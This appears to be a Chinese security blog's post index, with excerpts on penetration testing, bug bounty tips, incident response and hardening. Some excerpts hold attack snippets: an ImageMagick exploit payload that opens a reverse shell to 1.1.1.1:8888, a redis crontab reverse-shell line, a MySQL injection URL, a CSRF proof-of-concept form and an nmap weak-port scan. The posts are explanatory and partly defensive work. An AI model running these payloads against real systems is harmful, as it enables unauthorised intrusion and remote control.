
安全
hrayha
这个作者很懒,什么都没留下…
展开
-
一款识别域名是否使用cdn的工具cdnChecker
一款识别域名是否使用cdn的工具原创 2023-04-04 16:12:13 · 1876 阅读 · 1 评论 -
一个漏洞实例记录站点
List of bug bounty writeups · Pentester Land很多可以学习的地方原创 2022-03-26 22:38:00 · 387 阅读 · 0 评论 -
使用burp插件实现图片验证码的识别
早上看到朋友圈有人转了一个新的识别图片验证码的burp插件,项目主页https://github.com/f0ng/captcha-killer-modified正好之前对类似插件的使用效果不理想,于是使用了一下,整体来说,captcha-killer-modified与captcha-killer相同,都是结合第三方的ocr识别接口来识别图片验证码,但是这个项目里提到了一个免费的ocr识别项目ddddocr(项目地址https://github.com/sml2h3/ddddocr),确实好用,本文记原创 2022-03-24 09:24:59 · 8832 阅读 · 18 评论 -
内存马查杀工具FindShell试用
首先使用冰蝎创建一个内存马成功进入内存马界面接下来尝试使用findshell查杀,项目主页为https://github.com/4ra1n/FindShell服务器上首先部署代码,执行git clone https://github.com/4ra1n/FindShell.git然后进入到FindShell目录,打包项目,执行(如果没有mvn命令需要先yum -y install apache-maven安装)mvn package打包后在targe..原创 2022-03-17 20:34:12 · 7072 阅读 · 2 评论 -
frida注入进程报错Failed to spawn: unable to find application with identifier的一种解决思路
frida注入进程报错Failed to spawn: unable to find application with identifier的一种解决思路原创 2022-03-11 15:53:08 · 12603 阅读 · 1 评论 -
查找某款app的企业旗下其他app
注:当前web漏洞主要集中在app中,这里记录一个小技巧,可以收集某款app的企业旗下其他app,方便src挖洞。进入华为应用市场,搜索该企业旗下已知的一款app点击app logo部分,进入详情页详情页下拉,同开发者的其他应用处点击"更多",即可查看到其他该企业旗下app...原创 2022-01-21 16:01:22 · 2366 阅读 · 0 评论 -
csrf测试name=submit与submit()冲突导致无法自动提交表单的解决方法
pikachu靶场环境中,post的csrf在参数中有一个submit=submit,开始poc如下<html> <body> <form action="http://127.0.0.1/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"> <input type="hidden" name="sex" value="girl" /> <input type=原创 2021-12-18 21:56:34 · 706 阅读 · 0 评论 -
order by后为什么不能参数化原因
注:sql注入的防御手段主要为预编译,但是预编译对orderby,表名、列名都不生效,所以在orderby的位置测试sql注入往往成功率比较高,原因参考下面文章,这里给出结论"order by后不能参数化的本质是:一方面预编译又只有自动加引号的setString()方法,没有不加引号的方法;而另一方面order by后接的字段名不能有引号。"感兴趣的可以看完整的分析文章SQL预编译中order by后为什么不能参数化原因 - 诸子流 - 博客园...原创 2021-12-14 22:16:33 · 3141 阅读 · 0 评论 -
【转载】一个人的安全部系列
注:一个人的安全部主要问题在于人力资源的不足,甚至当只有一个人力预算的情况下,安全预算可能严重不足的,但是该有的东西还是不能少,只是实现上偏简单粗暴一些,转两篇文章记录一下,作者写的很详细,方便自己查漏补缺一个人的安全部之企业信息安全建设规划一个人的安全部之大话企业数据安全保护...转载 2020-07-15 19:45:25 · 940 阅读 · 0 评论 -
grafana权限管理
注:企业中往往有各种各样的应用系统,对于安全来说只要可能涉及到敏感数据的系统都要了解权限管理,这篇文章介绍grafana的权限管理比较详细,所以转一下,访问可能需要梯子https://medium.com/@maiccaejfeng/grafana-user-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86%E4%BB%A5%E5%8F%8A-dashboard-%E7%9A%84%E6%AC%8A%E9%99%90%E7%AE%A1%E7%90%86-d5c5转载 2020-07-04 15:59:31 · 1589 阅读 · 0 评论 -
【转载】绕过ssl pining使用burp抓包微信小程序
参考了https://xz.aliyun.com/t/6102不过文章里是用的windows,我是用的mac模拟器因为Genymotion是付费的,所以我选择了网易mumu,关于网易mumu如何使用adb连接以及配置代理可参考http://mumu.163.com/help/func/20190129/30131_797867.htmlmac安装adb 参考https://www.jianshu.com/p/69ba21b2996c安装frida的话直接执行pip install fr.转载 2020-06-19 19:51:10 · 2087 阅读 · 0 评论 -
hive开启ranger鉴权后set报错的解决方案(阿里云)
阿里云emr集群hive开启ranger后执行set时报错“java.lang.IllegalArgumentException: Cannot modify mapred.job.queue.name at runtime. It is not in list of params that are allowed to be modified at runtime”网上搜这个报错搜到华为云的一篇文章https://support.huaweicloud.com/trouble-mrs/mrs_03原创 2020-05-19 13:41:06 · 2794 阅读 · 0 评论 -
ranger对接ldap过程中遇到的一个坑
修改usersync的install.properties文件后,执行setup.shsetup.py文件存在一个bug,会修改hadoop-conf/core-site.xml文件权限及属主,导致服务不可用。(详见http://issues.apache.org/jira/browse/RANGER-2671)解决方法也比较简单:执行setup.sh前先将{usersync}/...原创 2020-04-17 21:01:55 · 676 阅读 · 0 评论 -
对某大型企业的一次web漏洞挖掘过程
前段时间利用周末时间对某大厂做了一次web安全检测,已经很久没搞,但是自己近几年没有脱离业务,并且对业务的理解有进一步的加深,反而可以挖到按以前的思路可能挖不到的漏洞,所以将大概的思考过程记录下来,因为是有稿费的,所以这里只贴上链接吧对某大型企业的一次web漏洞挖掘过程...原创 2020-04-12 18:09:32 · 752 阅读 · 1 评论 -
渗透中寻找突破口的那些事
注:之前发在乌云drops的一篇文章,汇总了自己对渗透测试中寻找突破口的一些总结,现在乌云drops没有了,所以发在自己blog上。一、寻找目标在自己日常检测中以及观察他人检测思路发现前期收集信息具有很关键的作用,很多时候不需要对某种漏洞有很深的研究,如果前期收集了足够多的目标,只需要检测一些常见的高危漏洞即可有收获常用思路1.网段信息1)通过子域名如果存在域传送这种...原创 2020-03-15 22:21:57 · 2029 阅读 · 1 评论 -
mysql注入-orderby之后limit位置
今天遇到的,记录下,如下位置产生sql注入select xxx from x order by xx limit {sql}花括号位置为可控的点,支持报错的话可以利用如下语句获取内容http://test.com/test.php?id=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23不支持报原创 2015-07-20 19:42:04 · 2497 阅读 · 0 评论 -
运维日志排查常用shell
转载至:https://github.com/yaseng/pentest/blob/master/note/audit-log.md前言记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。常用命令查找关键词并统计行数cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l转载 2016-03-01 18:19:50 · 1121 阅读 · 0 评论 -
劫持事件处理中针对gzip压缩数据包的处理
现在各种运营商的劫持都比较猖獗,可能不少小伙伴都处理过劫持事件,一般的处理过程可参考http://security.tencent.com/index.php/blog/msg/10与http://security.tencent.com/index.php/blog/msg/81 抓包的方法这里提一下,打开一般都是手机连接wifi,电脑上设置代理,但是有些劫持发生在3g、4g这种,给大家提供原创 2016-01-14 10:05:34 · 2375 阅读 · 0 评论 -
ImageMagick漏洞(cve-2016-3714)利用及修复
利用:如下内容保存为图片格式上传即可(命令部分自行替换)push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'pop graphic-context修复(php):上传时先利用getimage原创 2016-05-05 17:09:55 · 5318 阅读 · 3 评论 -
记录两个使用http2.0遇到的坑
因为苹果明年元旦开始要求苹果商店里的app使用连接必须都为https,因此最近在搞一些https+http2.0相关的调研,一开始就碰到两个小问题,这里记录下1.下载了新版nginx,修改了配置启用http2.0,但是发现无论如何都还是http1.1,后来看了https://iyaozhen.com/nginx-http2-conf.html 这篇文章,照着里面说的编译nginx的时候带了上新原创 2016-08-01 16:13:06 · 5126 阅读 · 0 评论 -
常见弱点端口扫描(限速)
./nmap -sT -sV -p 21,80,443,873,2601,2604,3128,4440,6082,6379,8000,8008,8080,8081,8090,8099,8088,8888,9000,9090,9200,11211,27017,28017 --max-hostgroup 10 --max-parallelism 10 --max-rtt-timeout 1000ms原创 2015-12-22 10:28:58 · 2007 阅读 · 0 评论 -
安全应急方法-站点页面被篡改
把自己工作中积累的一些经验写出来,希望对大家有帮助 1)找到被篡改页面,stat文件记录更改时间及用户等信息 2)将被篡改页面拷贝至其他非web目录,恢复正常页面 3)查看页面被篡改时间的accesslog,找出后门文件及操作ip(可能有多个ip访问后门,需要全部记录,重点记录第一个访问ip) 4)stat后门文件记录时间及操作用户等...原创 2017-03-27 17:39:14 · 3504 阅读 · 1 评论 -
安全应急方法-发现后门文件
主要指非web类后门,web类后门可参考一中的4及后面部分 1)记录文件stat信息,备份文件并删除 2)通过netstat -anltp命令可查看到当前连接信息及建立连接的进程pid,kill掉可疑连接的进程,且已知进程pid可以执行ls -al /proc/pid值 通过exe对应位置找到后门文件路径 3)通过ps aux命令检查是否存在其他可疑原创 2017-03-27 17:42:04 · 3677 阅读 · 0 评论 -
imagemaick的ghostscript RCE漏洞修复
漏洞信息可以参考imagemaick的ghost script RCE漏洞目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml在<policymap>标签中增加如下内容 <policy domain="co...原创 2018-08-24 14:20:39 · 888 阅读 · 0 评论 -
【转】redis利用姿势收集
redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;测试环境:CentOS,RHEL# 利用crontab反弹shellredis-cli flushall echo -e "\n\n*/1 * * * * /bin/bash -i >& /...转载 2018-10-25 21:16:51 · 1569 阅读 · 0 评论 -
一个linux的提权技巧
注:这篇文章最早在xiaoyu的百度空间看到过,今天又在51cto看到了,顺手转过来,属于一种较通用的提权方法,转自http://www.51cto.com/art/200907/139210.htm一个linux提权用的技巧,放出来攒RP了。OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_EN转载 2015-06-25 18:29:06 · 2606 阅读 · 2 评论